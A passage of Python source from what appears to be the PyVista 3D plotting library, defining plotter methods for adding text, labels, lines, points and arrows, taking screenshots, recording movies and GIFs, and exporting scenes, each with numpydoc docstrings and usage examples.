text : str
The text to add the rendering.
position : str, tuple(float), optional
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``.
font_size : float, optional
Sets the size of the title font. Defaults to 18.
color : str or sequence, optional
Either a string, RGB list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`.
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport : bool, optional
If ``True`` and position is a tuple of float, uses the
normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> actor = pl.add_text('Sample Text', position='upper_right', color='blue',
... shadow=True, font_size=26)
>>> pl.show()
"""
if font is None:
font = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if color is None:
color = self._theme.font.color
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': _vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': _vtk.vtkCornerAnnotation.LowerRight,
'upper_left': _vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': _vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': _vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': _vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = _vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = _vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value)
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24, quality=5, **kwargs):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imageio.get_writer``.
framerate : int, optional
Frames per second.
quality : int, optional
Quality of the movie, in the range ``0 - 10``; 10 is the top
possible quality for any codec. Higher quality leads to a larger file.
**kwargs : dict, optional
See the documentation for ``imageio.get_writer`` for additional kwargs.
Notes
-----
See the documentation for `imageio.get_writer
<https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_
Examples
--------
Open a MP4 movie and set the quality to maximum.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP
"""
from imageio import get_writer
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in ``"gif"``.
Examples
--------
Open a gif file.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.open_gif('movie.gif') # doctest:+SKIP
"""
from imageio import get_writer
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.open_movie('movie.mp4') # doctest:+SKIP
>>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP
See :ref:`movie_example` for a full example using this method.
"""
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.update()
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float, optional
Fill value for points in image that do not include objects
in scene. To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool, optional
Reset the camera clipping range to include data in view.
Returns
-------
numpy.ndarray
Image of depth values from camera orthogonal to image
plane.
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.store_image = True
>>> plotter.show()
>>> zval = plotter.get_image_depth()
"""
# allow no render window
if not hasattr(self, 'ren_win') and self.last_image_depth is not None:
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
self._check_rendered()
self._check_has_ren_win()
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = _vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.clipping_range
if self.camera.parallel_projection:
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far))
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line
segments would be represented as ``np.array([[0, 0, 0],
[1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
color : str or sequence, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
width : float, optional
Thickness of lines.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
vtk.vtkActor
Lines actor.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]])
>>> actor = pl.add_lines(points, color='yellow', width=3)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = _vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# Create actor
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [lines, label, rgb_color]
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
@wraps(ScalarBars.remove_scalar_bar)
def remove_scalar_bar(self, *args, **kwargs):
"""Remove the active scalar bar."""
self.scalar_bars.remove_scalar_bar(*args, **kwargs)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001, reset_camera=None, always_visible=False,
render=True):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : sequence or pyvista.DataSet
An ``n x 3`` sequence of points or a pyvista dataset with points.
labels : list or str
List of labels. Must be the same length as points. If a
string name is given with a :class:`pyvista.DataSet` input for
points, then the labels are fetched from that dataset.
italic : bool, optional
Italicises the point labels. Default ``False``.
bold : bool, optional
Bolds the point labels. Default ``True``.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
text_color : str or 3 item list, optional
Color of text. Either a string, RGB sequence, or hex color string.
* ``text_color='white'``
* ``text_color='w'``
* ``text_color=[1, 1, 1]``
* ``text_color='#FFFFFF'``
font_family : str, optional
Font family. Must be either ``'courier'``, ``'times'``,
or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
show_points : bool, optional
Controls if points are visible. Default ``True``.
point_color : str or sequence, optional
Either a string, rgb list, or hex color string. One of
the following.
* ``point_color='white'``
* ``point_color='w'``
* ``point_color=[1, 1, 1]``
* ``point_color='#FFFFFF'``
point_size : float, optional
Size of points if visible.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
shape_color : str or sequence, optional
Color of points (if visible). Either a string, rgb
sequence, or hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``.
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float, optional
The opacity of the shape in the range of ``[0, 1]``.
pickable : bool, optional
Set whether this actor is pickable.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
tolerance : float, optional
A tolerance to use to determine whether a point label is
visible. A tolerance is usually required because the
conversion from world space to display space during
rendering introduces numerical round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 0, 0],
... [1, 1, 0],
... [2, 0, 0]])
>>> labels = ['Point A', 'Point B', 'Point C']
>>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20,
... point_color='red', point_size=20, render_points_as_spheres=True,
... always_visible=True, shadow=True)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if font_family is None:
font_family = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if point_color is None:
point_color = self._theme.color
if text_color is None:
text_color = self._theme.font.color
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_data[labels]
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = _vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = _vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = _vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = _vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
self.add_mesh(vtkpoints, color=point_color, point_size=point_size,
name=f'{name}-points', pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera, render=render)
label_actor = _vtk.vtkActor2D()
label_actor.SetMapper(labelMapper)
self.add_actor(label_actor, reset_camera=False,
name=f'{name}-labels', pickable=False)
return label_actor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
An ``n x 3`` numpy.ndarray or pyvista dataset with points.
labels : str, optional
String name of the point data array to use.
fmt : str, optional
String formatter used to format numerical data.
preamble : str, optional
Text before the start of each label.
**kwargs : dict, optional
Keyword arguments passed to
:func:`pyvista.BasePlotter.add_point_labels`.
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
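Examples
--------
A minimal sketch labeling each point of a coarse sphere with its
scalar value (the ``'Data'`` array is created here for illustration):
>>> import pyvista
>>> sphere = pyvista.Sphere(theta_resolution=8, phi_resolution=8)
>>> sphere['Data'] = sphere.points[:, 2]
>>> pl = pyvista.Plotter()
>>> actor = pl.add_point_scalar_labels(sphere, 'Data', fmt='%.2f')
>>> pl.show()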
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = self._theme.font.fmt
if fmt is None:
fmt = '%.6e'
scalars = points.point_data[labels]
phrase = f'{preamble} {fmt}'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
Array of points or the points from a pyvista object.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
Actor of the mesh.
Examples
--------
Add a numpy array of points to a mesh.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> pl = pyvista.Plotter()
>>> actor = pl.add_points(points, render_points_as_spheres=True,
... point_size=100.0)
>>> pl.show()
"""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to the plotter.
Parameters
----------
cent : np.ndarray
Array of centers.
direction : np.ndarray
Array of direction vectors.
mag : float, optional
Amount to scale the direction vectors.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the arrows.
Examples
--------
Plot a random field of vectors and save a screenshot of it.
>>> import numpy as np
>>> import pyvista
>>> cent = np.random.random((10, 3))
>>> direction = np.random.random((10, 3))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_arrows(cent, direction, mag=2)
>>> plotter.show()
"""
if cent.shape != direction.shape: # pragma: no cover
raise ValueError('center and direction arrays must have the same shape')
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
if mag != 1:
direction = direction*mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = _vtk.vtkArrowSource()
arrow.Update()
glyph3D = _vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img):
"""Save to file and/or return a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file if requested
if isinstance(filename, (str, pathlib.Path, io.BytesIO)):
from PIL import Image
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in SUPPORTED_FORMATS:
raise ValueError(f'Unsupported extension {filename.suffix}\n' +
f'Must be one of the following: {SUPPORTED_FORMATS}')
filename = os.path.abspath(os.path.expanduser(str(filename)))
Image.fromarray(image).save(filename)
else:
Image.fromarray(image).save(filename, format="PNG")
# return image array if requested
if return_img:
return image
def save_graphic(self, filename, title='PyVista Export',
raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
This can be helpful for publication documents.
The supported formats are:
* ``'.svg'``
* ``'.eps'``
* ``'.ps'``
* ``'.pdf'``
* ``'.tex'``
Parameters
----------
filename : str
Path to save the graphic file to.
title : str, optional
Title to use within the file properties.
raster : bool, optional
Attempt to write 3D properties as a raster image.
painter : bool, optional
Configure the exporter to expect a painter-ordered 2D
rendering, that is, a rendering at a fixed depth where
primitives are drawn from the bottom up.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True)
>>> _ = pl.add_background_image(examples.mapfile)
>>> pl.save_graphic("img.svg") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
writer = _vtk.lazy_vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
if extension not in modes:
raise ValueError(f"Extension ({extension}) is an invalid choice.\n\n"
f"Valid options include: {', '.join(modes.keys())}")
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
def screenshot(self, filename=None, transparent_background=None,
return_img=True, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, pathlib.Path, BytesIO, optional
Location to write image to. If ``None``, no image is written.
transparent_background : bool, optional
Whether to make the background transparent. The default is
looked up on the plotter's theme.
return_img : bool, optional
If ``True`` (the default), a NumPy array of the image will
be returned.
window_size : 2-length tuple, optional
Set the plotter's size to this ``(width, height)`` before
taking the screenshot.
Returns
-------
numpy.ndarray
Array containing pixel RGB and alpha. Sized:
* [Window height x Window width x 3] if
``transparent_background`` is set to ``False``.
* [Window height x Window width x 4] if
``transparent_background`` is set to ``True``.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = self._theme.transparent_background
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery to work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if self.last_image is not None:
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise RuntimeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError("Nothing to screenshot - call .show first or "
"use the off_screen argument")
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
return self._save_image(self.image, filename, return_img)
@wraps(Renderers.set_background)
def set_background(self, *args, **kwargs):
"""Wrap ``Renderers.set_background``."""
self.renderers.set_background(*args, **kwargs)
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float, optional
A scaling factor when building the orbital extent.
n_points : int, optional
Number of points on the orbital path.
viewup : list(float), optional
The normal to the orbital plane.
shift : float, optional
Shift the plane up/down from the center of the scene by
this amount.
Returns
-------
pyvista.PolyData
PolyData containing the orbital path.
Examples
--------
Generate an orbital path around a sphere.
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50,
... shift=0.0, viewup=viewup)
See :ref:`orbiting_example` for a full example using this method.
"""
if viewup is None:
viewup = self._theme.camera['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
``NumberOfFlyFrames``; the LOD desired frame rate is used during the fly.
Parameters
----------
point : sequence
Point to fly to in the form of ``(x, y, z)``.
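Examples
--------
A small sketch (the target point below is an illustrative assumption):
fly toward a point near the top of a sphere.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pyvista.Sphere())
>>> pl.fly_to((0.0, 0.0, 0.5))  # doctest:+SKIP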
"""
self.iren.fly_to(self.renderer, point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
write_frames=False, threaded=False, progress_bar=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel.
focus : list(float) of length 3, optional
The point on which to focus the camera.
step : float, optional
The timestep between flying to each camera position.
viewup : list(float), optional
The normal to the orbital plane.
write_frames : bool, optional
Assume a file is open and write a frame on each camera
view during the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
progress_bar : bool, optional
Show the progress bar when proceeding through the path.
This can be helpful to show progress when generating
movies with ``off_screen=True``.
Examples
--------
Plot an orbit around the earth. Save the gif as a temporary file.
>>> import tempfile
>>> import os
>>> import pyvista
>>> filename = os.path.join(tempfile._get_default_tempdir(),
... next(tempfile._get_candidate_names()) + '.gif')
>>> from pyvista import examples
>>> plotter = pyvista.Plotter(window_size=[300, 300])
>>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True)
>>> plotter.open_gif(filename)
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24,
... shift=0.0, viewup=viewup)
>>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup,
... step=0.02)
See :ref:`orbiting_example` for a full example using this method.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = self._theme.camera['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.thickness = path.length
if progress_bar:
try: # pragma: no cover
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to use ``progress_bar=True``")
def orbit():
"""Define the internal thread for running the orbit."""
if progress_bar: # pragma: no cover
points_seq = tqdm(points)
else:
points_seq = points
for point in points_seq:
tstart = time.time() # include the render time in the step time
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
if write_frames:
self.write_frame()
else:
self.render()
sleep_time = step - (time.time() - tstart)
if sleep_time > 0:
time.sleep(sleep_time)
if write_frames:
self.mwriter.close()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
Parameters
----------
filename : str
Filename to export the scene to. A filename extension of
``'.vtkjs'`` will be added.
compress_arrays : bool, optional
Enable array compression.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_hexbeam())
>>> pl.export_vtkjs("sample") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format.
Parameters
----------
filename : str
Filename to export the scene to. Should end in ``'.obj'``.
Returns
-------
vtkOBJExporter
Object exporter.
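Examples
--------
A minimal sketch (the filename is an illustrative assumption): export a
single-sphere scene to a Wavefront ``.obj`` file.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pyvista.Sphere())
>>> pl.export_obj('scene.obj')  # doctest:+SKIP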
"""
# lazy import vtkOBJExporter here as it takes a long time to
# load and is not always used
try:
from vtkmodules.vtkIOExport import vtkOBJExporter
except ImportError:
from vtk import vtkOBJExporter
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
# We have to check here if it has the closed attribute as it
# may not exist should the plotter have failed to initialize.
if hasattr(self, '_closed'):
if not self._closed:
self.close()
self.deep_clean()
if hasattr(self, 'renderers'):
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show()
"""
if self.renderers.has_active_background_renderer:
raise RuntimeError('A background image already exists. '
'Remove it with ``remove_background_image`` '
'before adding one.')
# Need to change the number of layers to support an additional
# background layer
if not self._has_background_layer:
self.ren_win.SetNumberOfLayers(3)
renderer = self.renderers.add_background_renderer(image_path, scale, as_global)
self.ren_win.AddRenderer(renderer)
# setup autoscaling of the image
if auto_resize: # pragma: no cover
self.iren.add_observer('ModifiedEvent', renderer.resize)
@wraps(Renderers.remove_background_image)
def remove_background_image(self):
"""Wrap ``Renderers.remove_background_image``."""
self.renderers.remove_background_image()
# return the active renderer to the top, otherwise flat background
# will not be rendered
self.renderer.layer = 0
def _on_first_render_request(self, cpos=None):
"""Once an image or render is officially requested, run this routine.
For example, on the ``show`` call or any screenshot-producing code.
"""
# reset the camera for the first render unless a camera has already been set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
